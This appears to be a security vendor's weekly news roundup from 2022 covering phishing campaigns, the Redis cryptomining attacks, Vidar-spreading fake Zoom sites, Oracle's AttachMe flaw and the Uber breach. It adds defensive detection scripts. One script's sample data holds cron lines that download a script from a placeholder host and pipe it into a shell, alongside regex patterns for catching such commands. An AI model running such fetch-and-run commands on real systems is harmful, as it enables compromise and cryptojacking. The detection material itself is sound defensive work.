---
title: "Weekly Cyber News Updates, week 38 of 2022 | Phish Protection"
description: "Weekly Cyber News Updates, week 38 of 2022: Governments, Businesses, and individuals can experience huge complications if they suffer a data breach. A small."
image: "https://phishprotection.com/og/blog/weekly-cyber-news-updates-week-38-2022.png"
canonical: "https://phishprotection.com/blog/weekly-cyber-news-updates-week-38-2022/"
---


![Phish Protection blog post image](https://media.mailhop.org/phishprotection/images/2022/09/spear-phishing-protection-4839.jpg) 

Governments, businesses, and individuals can face serious complications if they suffer a [data breach](/phishing/data-breaches-how-they-impact-small-businesses). A small vulnerability can expose sensitive information when details are overlooked.

Implementing effective [phishing protection](/) measures can help mitigate different types of cyber attacks and the associated risks. The following is a summary of this week's **latest breach-related news**.

### Netflix Threat Actors Stage a Credential Harvesting Heist

Over the past years, Netflix customers have been warned about various **phishing threats** that share a common theme: [credential harvesting](https://www.mgocpa.com/perspective/credential-harvesting/). Cybercriminals send phishing emails to convince users that their Netflix account is in jeopardy and that they **must update** their credit card details to rectify the situation.

[INKY](https://www.inky.com/en/blog/fresh-phish-netflix-bad-actors-go-behind-the-scenes-to-stage-a-credential-harvesting-heist?&web%5Fview=true) recently detected Netflix being impersonated in a **PII data harvesting campaign** using compressed HTML attachments in zip files. The HTML attachments give the attackers a strategic advantage because the malicious page is hosted on the **victim’s machine**, not on the Internet. It therefore avoids standard URL reputation checks, and the phishing content **does not get detected**.

![Spear phishing protection](https://media.mailhop.org/phishprotection/images/2022/09/spear-phishing-protection-4839.jpg) 

#### How the attack happens

In the campaign, the attackers **spoofed** all sender email addresses to look like they came from Netflix’s domain. They sent [phishing emails](/content/stop-phishing-emails/) from a malicious mail server controlled by a Peruvian university.

Recipients got a request to resolve an account issue by downloading an attached form.

The email contains a **zip file**, which unzips an [HTML attachment](https://www.bleepingcomputer.com/news/security/html-attachments-remain-popular-among-phishing-actors-in-2022/) that builds a form, hosted on the victim’s machine, for harvesting Personally Identifiable Information (credit card info, billing address, date of birth, etc.).

Clicking “Agree and Continue” **forwards the data** to a bad actor.
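Because the form lives inside the attachment, a mail filter has to open the zip and inspect the HTML itself rather than rely on URL reputation. The following check is an added example, not code from INKY or the original article; the field-name hints, function names, and the sample attachment (built in memory, posting to a reserved `.invalid` host) are assumptions made for illustration.

```python
import io
import zipfile
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed, non-exhaustive hints for payment/identity field names.
SENSITIVE_HINTS = ("card", "cvv", "cvc", "expir", "birth", "dob", "billing")


class FormAudit(HTMLParser):
    """Collects remote form targets and sensitive-looking input fields."""

    def __init__(self):
        super().__init__()
        self.post_hosts, self.fields = [], []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            host = urlparse(a.get("action", "")).netloc
            if host:  # absolute or protocol-relative action: data leaves the local file
                self.post_hosts.append(host)
        elif tag in ("input", "select", "textarea"):
            label = " ".join(a.get(k, "") for k in ("name", "id", "autocomplete")).lower()
            if any(hint in label for hint in SENSITIVE_HINTS):
                self.fields.append(a.get("name") or a.get("id"))


def scan_zip_attachment(blob, max_member_bytes=2_000_000):
    """Return one finding per HTML member that posts sensitive fields to a remote host."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith((".html", ".htm")):
                continue
            if info.file_size > max_member_bytes:  # do not inflate oversized members
                findings.append({"member": info.filename, "verdict": "too-large"})
                continue
            audit = FormAudit()
            audit.feed(zf.read(info).decode("utf-8", "replace"))
            if audit.post_hosts and audit.fields:
                findings.append({"member": info.filename, "verdict": "harvest-form",
                                 "post_hosts": audit.post_hosts, "fields": audit.fields})
    return findings


# Constructed sample: a local form that submits card data to a remote host.
SAMPLE_FORM = """<html><body>
<form action="https://collector.example.invalid/submit" method="post">
  <input name="cardnumber"><input name="cvv"><input name="dob" type="date">
  <input name="billing_address"><button>Agree and Continue</button>
</form></body></html>"""


def build_sample_zip():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Account_Update.html", SAMPLE_FORM)
        zf.writestr("notes.html", "<html><body><p>No form here.</p></body></html>")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_zip_attachment(build_sample_zip()):
        print(finding)
```

A static parse like this only sees forms present in the markup; attachments that assemble the form with script at open time need rendering or script-level heuristics as well.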

### Over 39k Unauthenticated and Internet-Exposed Redis Services Targeted in a Cryptocurrency Campaign

Redis is an **open-source** data structure tool used as an in-memory [message broker](https://www.g2.com/articles/message-broker), distributed database, or cache. The developers did not design the tool to be exposed on the Internet; however, researchers discovered multiple Redis instances that were publicly accessible and **missing authentication**.

Researcher Victor Zhu detailed the Redis [unauthorized access vulnerability](https://securityaffairs.co/wordpress/136045/hacking/redis-cryptocurrency-campaign.html?web%5Fview=true) that hackers could exploit to compromise Redis instances exposed online. “Under certain circumstances, if the Redis services run with the **root account**, attackers can write the root account’s **SSH public key file** and directly login to the victim’s server. It allows threat actors to delete or steal data, gain server privileges, or execute **encryption extortion**, critically endangering normal operations.”

The experts discovered evidence of an **ongoing hacking campaign** in which threat actors used the file “/var/spool/cron/root” to store malicious [crontab](https://www.adminschoice.com/crontab-quick-reference) entries, using several Redis keys prefixed with the string “backup.” The cybercriminals used the crontab entries to execute a **remote server-hosted** shell script.

The shell script:

- Disables and stops running security-related processes.
- Disables and stops running system monitoring processes.
- Removes and purges **all security-related** and system log files, including shell histories (e.g., .bash\_history).
- Adds a **new SSH key** to the victim’s authorized\_keys file.
- Disables the [iptables](https://www.howtogeek.com/177621/the-beginners-guide-to-iptables-the-linux-firewall/) firewall.
- Installs several scanning and **hacking tools** like “masscan.”
- Installs and runs the crypto mining application XMRig.
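For incident responders, the crontab tampering described above leaves recognizable traces in the spool file. The triage function below is an added example, not code from the researchers or the original report. It assumes the file was written as a Redis dump (such dumps begin with the ASCII magic `REDIS` plus a four-digit version), and the function name, the sample bytes, and the `.invalid` hosts are constructed for illustration.

```python
import re

# Redis dump (RDB) files begin with "REDIS" followed by a 4-digit version.
RDB_MAGIC = re.compile(rb"REDIS\d{4}")
# Five cron schedule fields, then the command (user-crontab layout).
CRON_LINE = re.compile(rb"^\s*(?:[\d*/,\-]+\s+){5}(.+)$")
# A command that downloads content and pipes it straight into a shell.
FETCH_EXEC = re.compile(rb"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b")


def triage_cron_spool(data: bytes) -> dict:
    """Inspect the raw bytes of a cron spool file such as /var/spool/cron/root."""
    fetch_exec = []
    for raw in data.splitlines():
        m = CRON_LINE.match(raw)
        if m and FETCH_EXEC.search(m.group(1)):
            fetch_exec.append(m.group(1).decode("ascii", "replace").strip())
    rdb_magic = bool(RDB_MAGIC.match(data))
    return {
        "rdb_magic": rdb_magic,                      # crontab is really a Redis dump
        "backup_strings": data.count(b"backup"),     # context only: key prefix from the report
        "fetch_exec": fetch_exec,                    # cron jobs that fetch and run a script
        "suspicious": rdb_magic or bool(fetch_exec),
    }


# Constructed sample: a dump-like file with two keys whose values are cron lines.
SAMPLE_TAMPERED = (
    b"REDIS0009\xfa\tredis-ver\x055.0.7\xfe\x00"
    b"\x00\x07backup1\x3e\n"
    b"*/2 * * * * curl -fsSL http://files.example.invalid/init.sh | sh\n"
    b"\x00\x07backup2\x3f\n"
    b"*/3 * * * * wget -q -O- http://files.example.invalid/init.sh | bash\n"
    b"\xff"
)

# Constructed sample: a legitimate crontab that happens to mention "backup".
SAMPLE_CLEAN = (
    b"# constructed clean crontab\n"
    b"MAILTO=ops@example.invalid\n"
    b"30 2 * * * /usr/local/bin/backup.sh\n"
)

if __name__ == "__main__":
    print(triage_cron_spool(SAMPLE_TAMPERED))
    print(triage_cron_spool(SAMPLE_CLEAN))
```

The word “backup” alone is not treated as a verdict, since ordinary backup jobs contain it; it is reported only as supporting context next to the two stronger signals.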

### Hackers Steal Millions from Healthcare, Warns FBI

The FBI recently warned [healthcare organizations](https://cyware.com/news/hackers-steal-millions-from-healthcare-warns-fbi-c7b173c4) to be vigilant about cybercriminals who target **payment processors** and divert funds to their own bank accounts. It further added that bad actors stole over $4.6 million this year by compromising access to user accounts and **altering the payment information**.

Cybercriminals’ dirty tricks:

- They use publicly available personal information and [social engineering](/phishing-awareness/social-engineering-attack-twilio-compromises-employee-accounts-customer-data) techniques to gain unauthorized access to victims’ websites, payment details, and **healthcare portals**.
- Furthermore, they **spoofed** support centers and gained access to companies handling and delivering healthcare reimbursements.
- The threat actors can alter the **Exchange Server’s configurations** and rewrite the rules for targeted accounts, allowing them to receive the victim’s message copy.

#### Healthcare sector under attack

The healthcare sector has seen numerous [cybercriminal](/blog/cybercriminals-are-duping-millions-of-accounts-in-the-latest-facebook-phishing-campaign/) assaults in the recent past:

- The Texas OakBend Medical Center suffered a [ransomware attack](/resources/ransomware-attack-why-organizations-pay-ransom) that disrupted its communication and IT systems.
- HC3 noted that the Karakurt ransomware group carried out at least **four cyberattacks** affecting the U.S. **public health** and healthcare sectors since June.
- Russia-based Evil Corp targeted the U.S. healthcare sector to gain **intellectual information** using tools like Dridex and other ransomware.

### 2-Step Email Attack Executes Payload Using Powtoon Video

According to a report, the attacks begin when the victim receives an email that suggests it contains an **invoice** from the British [email security](/resources/practices-for-email-security-learning-implementing-protecting) firm Egress.

An Egress spokesperson said their investigation shows that the attack is a standard [brand impersonation](https://www.darkreading.com/attacks-breaches/email-attack-powtoon-video-execute-payload?&web%5Fview=true) tactic. “As you know, cybercriminals leverage many well-known and **trusted brands** to give legitimacy to their malicious attacks. In the reported instance, the recipients got a **phishing email** using an Egress Protect (email encryption) template.”

The spokesperson further added they could assure the users that there is no evidence that Egress became the victim of a [phishing attack](/resources/7-most-common-phishing-attacks-and-learning-to-protect-against-them). Furthermore, he dismissed all reports of **account takeover attacks** involving Egress employees or users as false. “The Egress customers or users need not take any action now.”

Once the user opens the scam Egress invoice, they are redirected to Powtoon, the **legitimate** video-sharing platform. The [threat actors](/phishing-awareness/threat-actors-using-malicious-onenote-attachments-to-spread-malware-via-phishing-emails) play a malicious video on Powtoon, ultimately presenting the user with a very convincing **malicious Microsoft login page** to harvest their credentials.

### Fake Zoom Sites Deploy Vidar Malware

CRIL (Cyble Research and Intelligence Labs) recently discovered [multiple fake Zoom sites](https://heimdalsecurity.com/blog/fake-zoom-sites-deploying-vidar-malware/?web%5Fview=true) designed to spread malware among Zoom users. The websites are designed with a **similar user interface**, and the malware is made to look like Zoom’s **legitimate application**.

#### Details About the Malware

CRIL analyzed the [malware](/content/protection-against-malware/what-is-malware) and established that it was Vidar Stealer, a **malicious code** with links to the Arkei stealer. Vidar steals the following information from an **infected device**:

- Banking information
- Saved passwords
- IP addresses
- Browser history
- Login credentials
- Crypto-wallets

Following is a list of fake Zoom websites to avoid:

- zoom-download\[.\]host
- zoom-download\[.\]space
- zoom-download\[.\]fun
- zoomus\[.\]host
- zoomus\[.\]tech
- zoomus\[.\]website

#### How the Vidar Malware Works

The deceiving sites **redirect victims** to a GitHub URL to download a [malicious](https://www.bleepingcomputer.com/news/security/malicious-android-apps-with-1m-plus-installs-found-on-google-play/) application which, upon execution, drops the following binaries in the temporary folder:

- ZOOMIN\~1.EXE
- Decoder.exe

These files execute the **cybercriminal’s code** to steal information from the machine.

### Oracle Cloud Infrastructure: Critical Vulnerability Allows Unauthorized Access

A recently discovered vulnerability in **OCI (Oracle Cloud Infrastructure)** allows [unauthorized access](https://www.infosecurity-magazine.com/news/flaw-in-oracle-cloud-unauthorized/?&web%5Fview=true) to all users’ cloud storage volumes, violating cloud isolation. The flaw, which cloud security experts at Wiz discovered and dubbed **AttachMe**, is part of the new advisory the company published.

According to Oracle, they **patched the flaw** for all customers within 24 hours of getting informed by Wiz. However, Elad Gabay, Wiz’s senior software engineer, said that before patching, an attacker might have **leveraged** the vulnerability to target all OCI users.

“The attacker might have read from or written to any attached or unattached storage volumes allowing **multi-attachment** provided he had its [OCID (Oracle Cloud Identifier)](https://k21academy.com/1z0-1072/ocid-its-importance-in-oracle-cloud-oci/). Thus, it might have allowed **exfiltration** of sensitive data or the **initiation** of destructive attacks by executable file manipulation.”

The Wiz advisory states that the potential attacks resulting from a hacker aware of the flaw included **cross-tenant access** and privilege escalation.

![Prevent spear phishing](https://media.mailhop.org/phishprotection/images/2022/09/prevent-spear-phishing-7842.jpg) 

### Uber Suffers Breach, Hackers Steal Vulnerability Reports

According to sources, a [cyberattack](https://www.bbc.com/news/uk-england-gloucestershire-64917275) forced Uber to **shut down** several engineering and internal communications systems.

Uber recently confirmed that its [high-security internal systems](https://cyware.com/news/uber-suffers-breach-vulnerability-reports-stolen-3f5fc55b) were targeted in a data breach by a cybercriminal who claims to have access to Uber’s sensitive data. The company tweeted that it had informed the **law enforcement** authorities and is investigating the incident.

_The threat actors provided screenshots of Uber’s IT systems, Slack server, Windows domain, and email dashboard._ Additionally, they may have access to Uber’s **Google-hosted** **cloud** infrastructure and [Amazon Web Services](https://www.dincloud.com/news/aws-servers-breached-in-a-highly-sophisticated-cyber-attack/) dashboard.

As per the report published by The New York Times, the attacker targeted an Uber employee’s **Slack account** using social engineering to gain **initial access**. The attacker used the [stolen credentials](https://www.itworldcanada.com/article/cyber-security-today-jan-16-2023-hackers-use-stolen-credentials-to-beat-norton-password-manager-and-more/522116) and accessed Uber’s internal systems containing classified information. Uber did not confirm if any customer data was compromised.

### Microsoft 365 Phishing Attacks Spoof U.S. Govt Websites

A progressive [phishing](/resources/what-is-phishing) campaign targeting U.S. government contractors is expanding its operation to push better-crafted documents and **higher-quality lures**. The lure in the phishing emails is a request for bids on profitable government projects, which redirects victims to phishing pages that clone legitimate federal agency portals.

The [Cofense](https://cofense.com/blog/credential-phishing-targeting-government-contractors-evolves-over-time) report says the operatives expanded their targeting and now **spoof** the Department of Commerce and the Department of Transportation. Moreover, the hackers are using many **unique lures** in the messages, removing typos from the attached PDFs, and improving the behavior of the phishing web pages.

_The phishing emails, according to Cofense, now feature larger logos, more consistent formatting, and a link to the [PDF](https://tech.hindustantimes.com/tech/news/this-pdf-malware-attacks-apple-mac-users-don-t-fall-for-it-know-what-experts-say-71660823717188.html) instead of a file attachment._ The phishing websites also exhibit targeted improvements, like using **HTTPS** on all websites in the same domain.


[ Brad Slavin ](/authors/brad-slavin/) 

General Manager

Founder and General Manager of DuoCircle. Product strategy and commercial lead across DuoCircle's 2,000+ customer base.
